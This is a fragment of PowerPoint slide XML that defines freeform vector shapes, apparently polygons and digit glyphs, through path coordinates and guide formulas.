                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 194 w 770"/>
                  <a:gd name="T1" fmla="*/ 0 h 599"/>
                  <a:gd name="T2" fmla="*/ 770 w 770"/>
                  <a:gd name="T3" fmla="*/ 79 h 599"/>
                  <a:gd name="T4" fmla="*/ 692 w 770"/>
                  <a:gd name="T5" fmla="*/ 599 h 599"/>
                  <a:gd name="T6" fmla="*/ 0 w 770"/>
                  <a:gd name="T7" fmla="*/ 394 h 599"/>
                  <a:gd name="T8" fmla="*/ 194 w 770"/>
                  <a:gd name="T9" fmla="*/ 0 h 599"/>
                  <a:gd name="T10" fmla="*/ 194 w 770"/>
                  <a:gd name="T11" fmla="*/ 0 h 5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70" h="599">
                    <a:moveTo>
                      <a:pt x="194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="770" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0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chemeClr val="accent2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" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4796427" y="4331144"/>
                <a:ext cx="990072" cy="759013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 707"/>
                  <a:gd name="T1" fmla="*/ 353 h 542"/>
                  <a:gd name="T2" fmla="*/ 173 w 707"/>
                  <a:gd name="T3" fmla="*/ 0 h 542"/>
                  <a:gd name="T4" fmla="*/ 707 w 707"/>
                  <a:gd name="T5" fmla="*/ 74 h 542"/>
                  <a:gd name="T6" fmla="*/ 637 w 707"/>
                  <a:gd name="T7" fmla="*/ 542 h 542"/>
                  <a:gd name="T8" fmla="*/ 0 w 707"/>
                  <a:gd name="T9" fmla="*/ 353 h 5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7" h="542">
                    <a:moveTo>
                      <a:pt x="0" y="353"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="173" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="542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" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5716480" y="4333944"/>
                <a:ext cx="2078171" cy="799624"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 86 w 1638"/>
                  <a:gd name="T3" fmla="*/ 56 h 630"/>
                  <a:gd name="T4" fmla="*/ 0 w 1638"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 1638 w 1638"/>
                  <a:gd name="T7" fmla="*/ 481 h 630"/>
                  <a:gd name="T8" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T9" fmla="*/ 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38" h="630">
                    <a:moveTo>
                      <a:pt x="1388" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="500"/>
                      <a:pt x="1091" y="531"/>
                      <a:pt x="1638" y="481"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0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" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5755691" y="4367554"/>
                <a:ext cx="1985745" cy="729604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 1565"/>
                  <a:gd name="T1" fmla="*/ 55 h 574"/>
                  <a:gd name="T2" fmla="*/ 1341 w 1565"/>
                  <a:gd name="T3" fmla="*/ 0 h 574"/>
                  <a:gd name="T4" fmla="*/ 1565 w 1565"/>
                  <a:gd name="T5" fmla="*/ 431 h 574"/>
                  <a:gd name="T6" fmla="*/ 1427 w 1565"/>
                  <a:gd name="T7" fmla="*/ 443 h 574"/>
                  <a:gd name="T8" fmla="*/ 608 w 1565"/>
                  <a:gd name="T9" fmla="*/ 518 h 574"/>
                  <a:gd name="T10" fmla="*/ 0 w 1565"/>
                  <a:gd name="T11" fmla="*/ 574 h 574"/>
                  <a:gd name="T12" fmla="*/ 78 w 1565"/>
                  <a:gd name="T13" fmla="*/ 55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65" h="574">
                    <a:moveTo>
                      <a:pt x="78" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="608" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78" y="5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" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4673193" y="4964121"/>
                <a:ext cx="3211082" cy="389309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 337 w 2293"/>
                  <a:gd name="T1" fmla="*/ 0 h 278"/>
                  <a:gd name="T2" fmla="*/ 0 w 2293"/>
                  <a:gd name="T3" fmla="*/ 27 h 278"/>
                  <a:gd name="T4" fmla="*/ 723 w 2293"/>
                  <a:gd name="T5" fmla="*/ 278 h 278"/>
                  <a:gd name="T6" fmla="*/ 2293 w 2293"/>
                  <a:gd name="T7" fmla="*/ 111 h 278"/>
                  <a:gd name="T8" fmla="*/ 1846 w 2293"/>
                  <a:gd name="T9" fmla="*/ 20 h 278"/>
                  <a:gd name="T10" fmla="*/ 745 w 2293"/>
                  <a:gd name="T11" fmla="*/ 121 h 278"/>
                  <a:gd name="T12" fmla="*/ 337 w 2293"/>
                  <a:gd name="T13" fmla="*/ 0 h 278"/>
                  <a:gd name="T14" fmla="*/ 337 w 2293"/>
                  <a:gd name="T15" fmla="*/ 0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93" h="278">
                    <a:moveTo>
                      <a:pt x="337" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2293" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="0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" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4429526" y="5001931"/>
                <a:ext cx="1256145" cy="1095107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 174 w 897"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 165 w 897"/>
                  <a:gd name="T3" fmla="*/ 18 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 897"/>
                  <a:gd name="T5" fmla="*/ 357 h 782"/>
                  <a:gd name="T6" fmla="*/ 817 w 897"/>
                  <a:gd name="T7" fmla="*/ 782 h 782"/>
                  <a:gd name="T8" fmla="*/ 897 w 897"/>
                  <a:gd name="T9" fmla="*/ 251 h 782"/>
                  <a:gd name="T10" fmla="*/ 174 w 897"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 174 w 897"/>
                  <a:gd name="T13" fmla="*/ 0 h 7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7" h="782">
                    <a:moveTo>
                      <a:pt x="174" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0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" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4474339" y="5043943"/>
                <a:ext cx="1173522" cy="1002681"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 838"/>
                  <a:gd name="T1" fmla="*/ 317 h 716"/>
                  <a:gd name="T2" fmla="*/ 154 w 838"/>
                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 838 w 838"/>
                  <a:gd name="T5" fmla="*/ 236 h 716"/>
                  <a:gd name="T6" fmla="*/ 766 w 838"/>
                  <a:gd name="T7" fmla="*/ 716 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 838"/>
                  <a:gd name="T9" fmla="*/ 317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8" h="716">
                    <a:moveTo>
                      <a:pt x="0" y="317"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="154" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="317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" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5573641" y="5119564"/>
                <a:ext cx="2608916" cy="977474"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T1" fmla="*/ 0 h 698"/>
                  <a:gd name="T2" fmla="*/ 80 w 1863"/>
                  <a:gd name="T3" fmla="*/ 167 h 698"/>
                  <a:gd name="T4" fmla="*/ 0 w 1863"/>
                  <a:gd name="T5" fmla="*/ 698 h 698"/>
                  <a:gd name="T6" fmla="*/ 1863 w 1863"/>
                  <a:gd name="T7" fmla="*/ 411 h 698"/>
                  <a:gd name="T8" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T9" fmla="*/ 0 h 698"/>
                  <a:gd name="T10" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T11" fmla="*/ 0 h 6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63" h="698">
                    <a:moveTo>
                      <a:pt x="1650" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:ln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5614252" y="5155975"/>
                <a:ext cx="2516491" cy="901853"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 1797"/>
                  <a:gd name="T1" fmla="*/ 163 h 644"/>
                  <a:gd name="T2" fmla="*/ 1607 w 1797"/>
                  <a:gd name="T3" fmla="*/ 0 h 644"/>
                  <a:gd name="T4" fmla="*/ 1797 w 1797"/>
                  <a:gd name="T5" fmla="*/ 367 h 644"/>
                  <a:gd name="T6" fmla="*/ 0 w 1797"/>
                  <a:gd name="T7" fmla="*/ 644 h 644"/>
                  <a:gd name="T8" fmla="*/ 72 w 1797"/>
                  <a:gd name="T9" fmla="*/ 163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97" h="644">
                    <a:moveTo>
                      <a:pt x="72" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1607" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1797" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163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19" name="Freeform 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC45329F-9B8C-4021-BAD4-370ED5EA1C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21236" y="2193331"/>
              <a:ext cx="138638" cy="245069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 110"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 110"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 110"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 110"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 110"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="194">
                  <a:moveTo>
                    <a:pt x="110" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="55" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="32"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61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49" y="30"/>
                    <a:pt x="44" y="33"/>
                    <a:pt x="41" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="41" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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1" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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0" name="Freeform 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99883ED-E447-444F-9897-8D1BB0715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6284" y="2194731"/>
              <a:ext cx="91025" cy="240867"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 65 w 65"/>
                <a:gd name="T1" fmla="*/ 172 h 172"/>
                <a:gd name="T2" fmla="*/ 31 w 65"/>
                <a:gd name="T3" fmla="*/ 172 h 172"/>
                <a:gd name="T4" fmla="*/ 31 w 65"/>
                <a:gd name="T5" fmla="*/ 36 h 172"/>
                <a:gd name="T6" fmla="*/ 0 w 65"/>
                <a:gd name="T7" fmla="*/ 37 h 172"/>
                <a:gd name="T8" fmla="*/ 0 w 65"/>
                <a:gd name="T9" fmla="*/ 12 h 172"/>
                <a:gd name="T10" fmla="*/ 65 w 65"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 65 w 65"/>
                <a:gd name="T13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172">
                  <a:moveTo>
                    <a:pt x="65" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31" y="172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="17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1" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17699652-4F44-44CD-B941-B61CA32184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43055" y="2953931"/>
              <a:ext cx="140038" cy="246469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 56 w 111"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 42 w 111"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="194">
                  <a:moveTo>
                    <a:pt x="111" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="142"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="56" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="6"/>
                    <a:pt x="96" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="32"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="33"/>
                    <a:pt x="42" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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2" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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2" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B22674-DC16-4F18-BA04-87809463C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6900" y="2953931"/>
              <a:ext cx="145640" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 115"/>
                <a:gd name="T1" fmla="*/ 191 h 191"/>
                <a:gd name="T2" fmla="*/ 3 w 115"/>
                <a:gd name="T3" fmla="*/ 191 h 191"/>
                <a:gd name="T4" fmla="*/ 3 w 115"/>
                <a:gd name="T5" fmla="*/ 166 h 191"/>
                <a:gd name="T6" fmla="*/ 55 w 115"/>
                <a:gd name="T7" fmla="*/ 101 h 191"/>
                <a:gd name="T8" fmla="*/ 69 w 115"/>
                <a:gd name="T9" fmla="*/ 76 h 191"/>
                <a:gd name="T10" fmla="*/ 74 w 115"/>
                <a:gd name="T11" fmla="*/ 56 h 191"/>
                <a:gd name="T12" fmla="*/ 69 w 115"/>
                <a:gd name="T13" fmla="*/ 36 h 191"/>
                <a:gd name="T14" fmla="*/ 56 w 115"/>
                <a:gd name="T15" fmla="*/ 29 h 191"/>
                <a:gd name="T16" fmla="*/ 42 w 115"/>
                <a:gd name="T17" fmla="*/ 38 h 191"/>
                <a:gd name="T18" fmla="*/ 37 w 115"/>
                <a:gd name="T19" fmla="*/ 62 h 191"/>
                <a:gd name="T20" fmla="*/ 1 w 115"/>
                <a:gd name="T21" fmla="*/ 62 h 191"/>
                <a:gd name="T22" fmla="*/ 1 w 115"/>
                <a:gd name="T23" fmla="*/ 61 h 191"/>
                <a:gd name="T24" fmla="*/ 15 w 115"/>
                <a:gd name="T25" fmla="*/ 17 h 191"/>
                <a:gd name="T26" fmla="*/ 56 w 115"/>
                <a:gd name="T27" fmla="*/ 0 h 191"/>
                <a:gd name="T28" fmla="*/ 96 w 115"/>
                <a:gd name="T29" fmla="*/ 15 h 191"/>
                <a:gd name="T30" fmla="*/ 111 w 115"/>
                <a:gd name="T31" fmla="*/ 56 h 191"/>
                <a:gd name="T32" fmla="*/ 103 w 115"/>
                <a:gd name="T33" fmla="*/ 88 h 191"/>
                <a:gd name="T34" fmla="*/ 75 w 115"/>
                <a:gd name="T35" fmla="*/ 127 h 191"/>
                <a:gd name="T36" fmla="*/ 51 w 115"/>
                <a:gd name="T37" fmla="*/ 162 h 191"/>
                <a:gd name="T38" fmla="*/ 115 w 115"/>
                <a:gd name="T39" fmla="*/ 162 h 191"/>
                <a:gd name="T40" fmla="*/ 115 w 115"/>
                <a:gd name="T41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91">
                  <a:moveTo>
                    <a:pt x="115" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
